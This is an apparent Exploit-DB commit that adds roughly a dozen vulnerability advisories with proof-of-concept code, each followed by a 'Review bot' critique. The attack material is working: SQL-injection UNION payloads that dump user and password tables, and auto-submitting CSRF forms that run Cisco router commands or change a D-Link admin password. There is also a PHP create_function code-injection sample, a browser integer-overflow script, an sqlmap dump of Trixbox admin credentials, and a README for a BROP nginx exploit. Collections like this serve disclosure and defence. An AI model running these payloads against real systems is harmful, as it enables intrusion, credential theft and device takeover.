Updated 03_22_2014

Offensive Security 2014-03-22 04:31:38 +00:00
parent 595a23d463
commit 81eda5a35c
41 changed files with 1487 additions and 210 deletions

files.csv



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31242/info
Sama Educational Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/Error.asp?Message=XSS
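Review bot: No affected-version line is given before the PoC, unlike the sibling entries in this commit (rgb72 WCMS 1.0b, Omnicom Content Platform 2.0), so the scope of the Error.asp finding is unclear; add the version from BID 31242 or state that the advisory names none. The request shows the `Message` query parameter being reflected by Error.asp, so the defensive fix to document is HTML-encoding that value on output.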

platforms/asp/webapps/32401.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31298/info
rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
rgb72 WCMS 1.0b is vulnerable; other versions may also be affected.
http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00
http://www.example.com/[path]/news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00
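Review bot: The two PoC requests use different column counts (8 in the first, 13 in the second) against the same news_detail.asp page without saying which layout or version each applies to; add a line explaining the difference, otherwise one of them is dead weight. Both also rely on a trailing `%00` to truncate the remainder of the query, which is worth stating explicitly since it tells the vendor that `id` is concatenated unparameterized into the SQL string; the fix to record is a parameterized query for `id`.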

platforms/asp/webapps/32412.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31338/info
Omnicom Content Platform is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
To exploit this issue an attacker may need administrative privileges to the affected application.
Exploiting the issue may allow the attacker to obtain sensitive information that could aid in further attacks.
Omnicom Content Platform 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/ocp/admin/fileKontrola/browser.asp?root=/
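Review bot: The text says exploitation may require administrative privileges (L41) but the PoC request gives no indication of whether browser.asp enforces authentication; say whether the `root=/` request was sent with an admin session, since that decides whether this is an authenticated admin feature misbehaving or an unauthenticated traversal. Either way the `root` parameter is accepted as an absolute path, so the fix to document is restricting it to a path under the application's content directory.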


@ -0,0 +1,231 @@
Document Title:
===============
Wireless Drive v1.1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1229
Release Date:
=============
2014-03-19
Vulnerability Laboratory ID (VL-ID):
====================================
1229
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
Why carry a physical USB drive around wherever you go, cluttering up your key ring? Instead, this simple, convenient app converts your
iOS device into a wireless hard drive that works over WiFi! Simple. Powerful. Convenient. Wireless Drive: One of those apps you`ll end
up using all the time! Features:
- Transfer files without limitation
- Support files in any format and size
- Use WiFi or iTunes File Sharing to transfer files between your iOS device and computer
- Perfect app for transporting large collections of video
- Use it to transfer work documents from office to home, simple and easily
(Copy of the Homepage: https://itunes.apple.com/de/app/wireless-drive-transfer-share/id569832333 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official OnDemandWorld Wireless Drive v1.1.0 mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
OnDemandWorld
Product: Wireless Drive - Transfer & Share Files over WiFi 1.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious
`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability
is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload file
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Upload > Menu File Dir List (http://localhost:4096)
1.2
A local command/path injection web vulnerabilities has been discovered in the official OnDemandWorld Wireless Drive v1.1.0 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `[foldername]` value of the wifi file dir list module. Local attackers are able to inject own malicious
system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders.
The execution of the local command inject via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of
the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] Sync
Vulnerable Parameter(s):
[+] foldername (path value)
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction and with low privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Upload File > filename [Sub Dir]
<tr><td rowspan="3"><img src="Blank.jpg" height="50px" align="middle" width="50px"></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/A77E7236-BFEA-4C38-97B4-00CC483C3D04.
?filename=<../[LOCAL FILE INCLUDE VULNERABILITY!]>" alt="<../[LOCAL FILE INCLUDE VULNERABILITY!]>"><strong><../[LOCAL FILE INCLUDE VULNERABILITY!]"></strong></a></td></tr>
<tr><td> 0.5 KB</td></tr><tr><td> 2014-03-19 11:55:51</td></tr><tr><td rowspan="3"><img src="PNG.jpg" align="middle" width="50px" height="50px"/></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/48123658-2770-400F-9D04-31EBF5142634.png?filename=1.png" alt="1.png"><strong>1.png</strong></a></td></tr>
<tr><td> 0.5 KB</td></tr><tr><td> 2014-03-19 11:53:05</td></tr><tr><td rowspan="3"><img src="JPG.jpg" align="middle" width="50px" height="50px"/></td>
<td><a href="5FCAF1DE-6D23-463B-ABE0-FFB0191DF038/C3C427D4-7B42-49A3-9A68-D7B4881CAB2C.jpg?filename=Sample.jpg" alt="Sample.jpg"><strong>Sample.jpg</strong></a></td></tr>
<tr><td> 175.2 KB</td></tr><tr><td> 2013-02-23 18:48:42</td></tr></table>
</p><form action="" method="post" enctype="multipart/form-data" accept-charset="utf-8" name="form1" id="form1"><label>Upload file: <input type="file"
name="upload1" id="upload1" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></strong></a></td></tr>
--- PoC Session Logs [POST] ---
POST http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038 Load Flags[LOAD_FROM_CACHE ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
Request Header:
Host[localhost:4096]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64;
rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer
[http://localhost:4096/5FCAF1DE-6D23-463B-ABE0-FFB0191DF038]
POST-Daten:
POST_DATA[-----------------------------23750323325183
Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]_*"
Content-Type: image/png
1.2
The command inject vulnerability can be exploited by local attackers with physical device access or low privileged user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Sync > foldername [Index]
<tbody><tr><td rowspan="3"><img src="folder.jpg" height="50px" align="middle" width="50px"></td>
<td><a href="./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-" alt="./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-"><strong>
./[LOCAL COMMAND INJECT VULNERABILITY VIA FOLDERNAME]-</strong></a></td></tr><tr><td>Folder</td></tr><tr><td>2014-03-19</td></tr>
</tbody>
Solution - Fix & Patch:
=======================
1.1
The local command inject web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Encode also the filename index listing to prevent execution of malicious commands, injection of script codes or file include attacks.
1.2
The local command inject web vulnerability can be patched by a secure parse and restriction of the rename and foldername value in the wifi app.
Encode also the output index list were the folders will become visible after the sync.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the wifi exchange interface is estimated as high(+).
1.2
The local command inject vulnerability in the foldername value via sync is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
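Review bot: Solution 1.1 (L173) describes patching the "local command inject web vulnerability", but 1.1 in Technical Details (L97) is the local file include in the upload `filename`; the sentence looks copied from 1.2 and should say file include. The scores also disagree: the header gives 6.8, 1.1 gives 6.7(+)|(-)6.8, 1.2 gives 5.6(+)|(-)5.7, and Severity Level is a single "High", so state one score per issue and derive the severity from it. On the fix itself, the dir-list markup at L139 echoes the raw `filename` into href, alt and the link text, so beyond rejecting path separators and `..` in uploaded names, the listing needs HTML encoding of the name, as L174 already hints.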


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31218/info
The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.
Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.
The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="asdf.submit();"> <form name=asdf method="post" action="http://example.com/level/15/exec/-"> <input type=hidden name=command value="show privilege"> <input type=hidden name=command_url value="/level/15/exec/-"> </body> </html>
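Review bot: The claim at L217 that successful exploits run arbitrary commands is not what the PoC shows: the hidden `command` field only sends `show privilege`, so add a sentence that the `command` value is attacker-chosen and that this one is a read-only demonstration. The markup also opens `<body>` twice and never closes `<form>`; browsers tolerate it, but it should be cleaned up. No mitigation is given; the entry should at least note that the issue depends on the IOS HTTP administration server being enabled and that level-15 exec requests are accepted from a cross-origin form POST with no anti-CSRF token.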


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31218/info
The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.
Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.
The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.
<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html>
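Review bot: This file differs from the "Universal Exploit #1" entry above only in the form action (`/level/15/exec/-/configure/http`), the `command` value (`alias exec xx xx`) and the extra `new_command_url` field, yet neither file explains the distinction; add a comment that #1 issues an exec-mode command while #2 enters configure mode and writes a configuration change, which is the higher-impact case and should drive the severity rating. The same markup defects apply here (duplicate `<body>`, unclosed `<form>`).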


@ -0,0 +1,77 @@
####################################################################################
# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
CSRF Vulnerability
# Google Dork: N/A
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/A
# Hardware Version:E4
# Firmware Version:5.10
# Tested on: Router Web Server
# CVE : N/A
###################################################################################
Cross Site Request Forgery
This Modem's Web Application , suffers from Cross-site request forgery
through which attacker can manipulate user data via sending him malicious
craft url.
The Modems's Application not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password:
In the POC the IP address in the POST is the modems IP address.
<html>
<body>
<form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
method="POST">
<input type="hidden" name="settingsChanged" value="1" />
<input type="hidden" name="config.login_name" value="admin" />
<input type="hidden" name="config.password" value="YWRtaW4A" />
<input type="hidden"
name="config.web_server_allow_graphics_auth"
value="false" />
<input type="hidden"
name="config.web_server_allow_wan_http" value="false" />
<input type="hidden"
name="config.web_server_wan_port_http" value="8080" />
<input type="hidden"
name="config.wan_web_ingress_filter_name" value="" />
<input type="hidden" name="wan_ingress_filter_details"
value="" />
</form>
</body>
<script type="text/javascript">
document.getElementById("poc").submit();
</script>
</html>
______________________
*Dhruv Shah* *aka Snypter*
Blogger | Researcher | Consultant | Writer
Youtube <http://www.youtube.com/snypter> |
Facebook<http://www.facebook.com/dhruvshahs>|
Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
Twitter<https://twitter.com/Snypter>|
Blog <http://security-geek.in/blog/>
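Review bot: The header contradicts itself: the title (L234) says Hardware Version AX, Firmware 1.00, while L242-L243 say Hardware Version E4, Firmware 5.10; state which was actually tested, because D-Link hardware revisions ship different firmware lines. The `config.password` value `YWRtaW4A` is base64 for `admin` followed by a NUL byte, which the PoC never says; a comment would stop readers from taking it as the literal password. The text also calls this a "malicious craft url" although the PoC is an auto-submitted POST form, and the hidden fields additionally switch off WAN HTTP access and graphics auth (`config.web_server_allow_wan_http`, `config.web_server_allow_graphics_auth`), which is worth noting since a victim would see those settings change as well.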

platforms/linux/dos/32384.txt Executable file

@ -0,0 +1,65 @@
source: http://www.securityfocus.com/bid/31201/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
This issue affects versions prior to Linux kernel 2.6.22.2.
[global]
bs=8k
iodepth=1024
iodepth_batch=60
randrepeat=1
size=1m
directory=/home/oracle
numjobs=20
[job1]
ioengine=sync
bs=1k
direct=1
rw=randread
filename=file1:file2
[job2]
ioengine=libaio
rw=randwrite
direct=1
filename=file1:file2
[job3]
bs=1k
ioengine=posixaio
rw=randwrite
direct=1
filename=file1:file2
[job4]
ioengine=splice
direct=1
rw=randwrite
filename=file1:file2
[job5]
bs=1k
ioengine=sync
rw=randread
filename=file1:file2
[job7]
ioengine=libaio
rw=randwrite
filename=file1:file2
[job8]
ioengine=posixaio
rw=randwrite
filename=file1:file2
[job9]
ioengine=splice
rw=randwrite
filename=file1:file2
[job10]
ioengine=mmap
rw=randwrite
bs=1k
filename=file1:file2
[job11]
ioengine=mmap
rw=randwrite
direct=1
filename=file1:file2
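Review bot: The entry never says what consumes this job file or how it was run; the `[global]`/`[jobN]` sections with `ioengine`, `iodepth`, `rw` and `numjobs` keys are a tool configuration, not a standalone program, so add the invocation and, since L294-L296 only say "kernel crash", which engine or code path (sync, libaio, posixaio, splice and mmap are all exercised) was implicated. Also note that `job6` is skipped between `[job5]` and `[job7]`, and that `directory=/home/oracle` is a hardcoded path that must exist and be writable; both should be stated so that a reproduction on a patched kernel (the fix is in 2.6.22.2 per L296) is comparable.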


@ -0,0 +1,21 @@
nginx <= 1.4.0 exploit for CVE-2013-2028
by sorbo
Fri Jul 12 14:52:45 PDT 2013
./brop.rb 127.0.0.1
for remote hosts:
./frag.sh ip
./brop.rb ip
rm state.bin when changing host (or relaunching nginx with canaries)
scan.py will find servers, reading IPs from ips.txt
This is a generic exploit for 64-bit nginx which uses a new attack technique (BROP) that does not rely on a particular target binary. It will work on any distro and even compiled from source installations.
Exploit: http://www.exploit-db.com/sploits/32277.tgz
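Review bot: The title's `<= 1.4.0` overstates the affected range: CVE-2013-2028 is the chunked transfer-encoding stack overflow introduced in nginx 1.3.9, so 1.3.8 and earlier are not affected and the range should read 1.3.9 through 1.4.0 (fixed in 1.4.1 and 1.5.0). The README also references `frag.sh`, `scan.py`, `ips.txt` and `state.bin` without saying what each does beyond the one hint that `state.bin` must be removed when the host or canaries change, i.e. it caches per-target state; a one-line description per file would help, and the canary remark deserves to stay because it is the reason a restart of the server invalidates what was learned.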

platforms/multiple/dos/32381.js Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/31155/info
Avant Browser is prone to an integer-overflow vulnerability that occurs in the JavaScript engine.
An attacker can exploit this issue by enticing an unsuspecting victim to view a malicious site.
Successfully exploiting this issue may allow attackers to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
Avant Browser 11.7 Build 9 is vulnerable; other versions may also be affected.
NOTE: This vulnerability may be related to the issue described in BID 14917 (Mozilla Browser/Firefox JavaScript Engine Integer Overflow Vulnerability).
<script>
var s=String.fromCharCode(257);
var a=""; var b="";
for(i=0;i<1024;i++){a=a+s;}
for(i=0;i<1024;i++){b=b+a;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += b;
alert("0x90");
var Fuck=escape(ov);
alert("0x90 !");
alert(Fuck);
</script>
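Review bot: The script doesn't say what it is trying to overflow. Reading it: `s` is U+0101, `a` is 1024 of them, `b` is 1024 copies of `a` (1 MiB), `ov` is doubled 28 times (2^28 characters) and then 88 copies of `b` are appended, and `escape()` at L390 expands each U+0101 to the 6-character sequence `%u0101`; the entry should state whether the overflow is in that length calculation, because otherwise the sizes look arbitrary. Minor: `i` is never declared, the three `alert()` calls are progress markers rather than part of the trigger, and the variable name at L390 should be changed.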


@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/31205/info
Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
The following applications using the engine are vulnerable:
Unreal Tournament 3.1.3
Unreal Tournament 2003
Unreal Tournament 2004
Dead Man's Hand
Pariah
WarPath
Postal 2
Shadow Ops
http://www.exploit-db.com/sploits/32386.zip
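Review bot: The entry gives no technical detail beyond "an error in memory allocation" (L399) and defers everything to the external zip at L410, so nothing here lets a reader or vendor confirm which network message or allocation is involved; add at least a summary of the trigger and say which of the listed titles were actually tested rather than assumed vulnerable through the shared engine.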


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31294/info
Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Foxmail Email Client 6.5 is vulnerable; other versions may also be affected.
<html> <body> <P>Author:friddy QQ:568623 <P>Result:Program Crash <BR> <A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">ClickME</a> >Clickme</A> </body> </html>
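Review bot: The mailto: payload at L419 is shown truncated (`A%...` followed by dots), so the length that crashes the client can't be read from the entry; give the byte count of the address. The anchor markup is also broken: `...ClickME</a> >Clickme</A>` closes the link twice, and the `<P>` author/result lines do not belong in the PoC body. Since the text says failed attempts yield a crash (L417), the entry should also state which component handles the mailto: URL, so the fix (bounds-checking the address before copying it) can be located.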


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31178/info
Accellion File Transfer Appliance is prone to an open-email-relay vulnerability.
An attacker could exploit this issue by constructing a script that would send unsolicited spam to an unrestricted amount of email addresses from a forged email address.
This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189.
https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport
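Review bot: The request log is flattened onto one line, and inside it `client_email=email_to_spam% 40victim_domain.com` has a space splitting the `%40` encoding, which would not send as shown; reflow it into headers and body and fix the encoding. The description (L426) talks about a forged sender address, but the visible POST only sets `description` and `client_email`, with the `<H1>SPAM_ATTACK</H1>` injected via the `id` query parameter, so explain where the From address is controlled, or otherwise restate the issue as unauthenticated use of the error-report mailer to arbitrary recipients with HTML injected into the body.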

platforms/php/remote/32416.php Executable file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/31398/info
PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.
An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.
This weakness is reported in PHP 5.2.6; other versions may also be affected.
<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
usort($databases, create_function('$a, $b', $sort_function));
?>
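Review bot: The sample calls the generated function through `usort()` (L445), so it doesn't demonstrate the claim at L436 that the function need not be called for the injected code to run; that is what the companion 32417.php file shows, and the two should say so. Code issues in the sample: `$_GET[sort_by]` uses an unquoted key, `$sort_order` is never set (so the expression always yields `-1`), and `stripslashes()` only makes sense with magic_quotes on. The defensive point to draw out is that `$sort_by` is concatenated into source code, so escaping cannot fix it; the comparison should be a closure that reads the key as data.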

platforms/php/remote/32417.php Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31398/info
PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.
An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.
This weakness is reported in PHP 5.2.6; other versions may also be affected.
<?php
$funstring = 'return -1 * var_dump($a[""]);}phpinfo();/*"]';
$unused = create_function('',$funstring);
?>
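Review bot: This file demonstrates the "need not be called" claim from L454 (`$unused` is never invoked), but the code gives no hint of that; a comment saying the injected `phpinfo();` runs when `create_function()` evaluates the generated source, before any call, would make the point. The trailing `/*` also leaves an unterminated comment after the injected statement, which is worth noting as the mechanism by which the leftover `"]` and the wrapper's closing brace are swallowed.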

platforms/php/webapps/32239.txt Executable file

@ -0,0 +1,61 @@
# Exploit Title: SQL injection in Trixbox All Versions
# Date: 13/03/2014
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Software Link: http://trixbox.org/downloads
# Tested on: Linux / Win 7
Example : (Grab users / password hashes from ampusers)?
root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10
[*] starting at 07:53:52
[07:53:52] [INFO] resuming back-end DBMS 'mysql'
[07:53:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: bookId
? ? Type: boolean-based blind
? ? Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
? ? Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK
? ? Type: AND/OR time-based blind
? ? Title: MySQL < 5.0.12 AND time-based blind (heavy query)
? ? Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM
---
[07:53:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5
[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 2
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: username
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: password
[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 1
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: passw0rd
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 5
[07:53:52] [INFO] resumed: admin
[07:53:52] [INFO] analyzing table dump for possible password hashes
Database: asterisk
Table: ampusers
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin ? ?| passw0rd |
+----------+----------+
===================================================================================
GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com?
The End :P
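Review bot: The output is a cached replay, not evidence: every value is `resumed:` and the summary line reports `a total of 0 HTTP(s) requests` (L478), so this session never touched the target. Rerun without the saved session, or at least say so. The title claims "All Versions" but no tested version appears, and the only vulnerable-parameter information is buried in the sqlmap payloads (`bookId` in `web-meetme/conf_cdr.php`, L474/L481), which should be stated plainly together with the fix (parameterizing `bookId`). Note also that the `?` characters in the payload and table lines are mojibake for the indentation of the original output.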

platforms/php/webapps/32375.txt Executable file

@ -0,0 +1,174 @@
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that
theoretically can be used to gain unauthorized access to a user account or collect
sensitive information of this user.
SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
